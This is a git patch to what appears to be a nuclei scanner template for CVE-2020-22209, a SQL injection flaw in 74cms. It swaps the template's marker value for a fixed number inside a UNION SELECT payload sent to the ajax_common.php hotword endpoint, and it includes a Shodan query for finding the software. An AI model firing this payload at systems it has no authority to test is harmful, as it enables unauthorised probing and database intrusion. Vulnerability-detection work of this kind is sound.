From c0faa97f932fe1318ed4c9f7b18c8e63d648215a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 30 Jun 2022 08:20:26 +0530 Subject: [PATCH] Update CVE-2020-22209.yaml --- cves/2020/CVE-2020-22209.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-22209.yaml b/cves/2020/CVE-2020-22209.yaml index 4f25b8783c..8b2adad1c9 100644 --- a/cves/2020/CVE-2020-22209.yaml +++ b/cves/2020/CVE-2020-22209.yaml @@ -19,15 +19,18 @@ info: shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" + requests: - method: GET path: - - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5("{{randstr}}"),3%23%27' + - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27' matchers: - type: word part: body words: - - '{{md5("{{randstr}}")}}' + - '{{md5({{num}})}}' # Enhanced by cs on 2022/06/21